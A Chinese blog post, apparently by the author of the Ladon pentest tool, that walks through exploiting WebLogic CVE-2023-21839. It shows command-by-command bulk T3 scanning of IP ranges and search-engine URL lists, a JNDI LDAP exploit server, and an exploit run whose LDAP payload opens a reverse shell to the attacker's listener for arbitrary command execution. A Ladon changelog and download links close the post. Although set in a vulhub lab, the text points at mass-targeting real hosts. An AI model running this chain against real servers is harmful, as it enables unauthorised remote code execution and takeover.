logo

K8哥哥

没有绝对安全的系统

〖EXP〗Ladon漏洞复现 CVE-2023-21839 Weblogic

本文于 599 天之前发表

0x00 实验环境

攻击机:Windows

靶场:vulhub 12.2.1.3环境

0x01 影响版本

允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,这可能会导致 RCE 漏洞

WebLogic_Server = 12.2.1.3.0
WebLogic_Server = 12.2.1.4.0
WebLogic_Server = 14.1.1.0.0

0x02 漏洞复现

####(1)Ladon T3info模块探测 weblogic版本

探测到版本代表开启T3协议 版本符合可尝试是否存在漏洞

Ladon noping 192.168.188.2/24 T3info
Ladon 192.168.188.2:7001 T3info
Ladon http://192.168.188.2:7001 T3info
Ladon url.txt T3info
Ladon noping ip.txt T3info
LadonGo对应模块为T3scan

相关搜索引擎导出url,然后批量检测T3协议

Ladon url.txt T3info > T3ver.txt

当然也可以直接检测目标C段是否存在weblogic

Ladon noping ip24.txt T3info > T3ver.txt
Ladon noping 192.168.1.8/24 T3info > T3ver.txt

####(2)FindIP模块匹配目标

Key.txt存放LadonGUI处理的目标C段,当然手动也可以,使用

Ladon FindIP key.txt T3ver.txt

匹配C段是否出现在结果中,出现则有可能与目标有关,可以尝试GetShell

图片

####(3)使用网上开源工具https://github.com/4ra1n/CVE-2023-21839

GO编译

go build -o CVE-2023-21839.exe

####(4)漏洞检测

通过Ladon监听,无需dnslog等,不会向第3方泄露授权检测站点漏洞信息,部署在目标内网也可解决目标内网不出网无法利用目标内网存在相关漏洞的问题。

Ladon 监听命令:

Ladon web 800

使用20230228后版本,不然批量LDAP时可能会崩溃

exp测试漏洞

exp.exe -ip 192.168.188.3 -port 7001 -ldap ldap://192.168.188.2:800

Ladon监听出现JNDI_LDAP字符串 代表存在JNDI注入漏洞

图片

####(4)反弹shell:

使用JNDI漏洞利用工具,在VPS开启服务,监听1389端口。

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.188.2 -l 1389 -p 9999

####(5)在VPS上使用Ladon监听端口:

Ladon NC监听 4444

####(6)在渗透机上执行以下命令

CVE-2023-21839 -ip 192.168.188.3 -port 7001 -ldap ldap://192.168.188.2:1389/Basic/ReverseShell/192.168.188.2/4444

图片

####(7)成功getshell

接下来就可以执行任意命令,linux也可以使用自带NC监听,对于windows可使用PowerLadon内存加载后渗透。

图片

Ladon 10.9 20230302
[u]LadonExp 编译EXE支持执行CMD Payload变量$cmd$ 变量$b64cmd$
[u]web CS版不含该模块 识别JAVA JNDI_LDAP JNDI_RMI请求
[u]WebLogicPoc CVE-2020-14883高危漏洞检测可识别出Windows或Linux
[-]PortTran CS版移除 端口转发工具
[u]Ladon911 本地测试用的全功能版(即保留旧漏洞和一些过时功能)
[-]Help 仅911版保留 功能很多 建议看Wiki或Ladon Study
[-]SMBGhost 仅CS和911版保留 Win10默认自动更新,实战遇到概率低
[-]vsFTPdPoc 仅CS和911版保留 2011漏洞过旧,实战遇到概率低
[-]CVE-2021-36934 仅CS和911版保留 Win10默认自动更新,实战可用概率低
[-]PhpStudyPoc 仅CS和911版保留

如果已整理好URL,可使用WhatCMS快速识别

1
Ladon url.txt WhatCMS

Ladon下载

PowerLadon: https://github.com/k8gege/PowerLadon
历史版本: http://github.com/k8gege/Ladon/releases
911版本:http://k8gege.org/Download
10.10版本:K8小密圈

扫码加入K8小密圈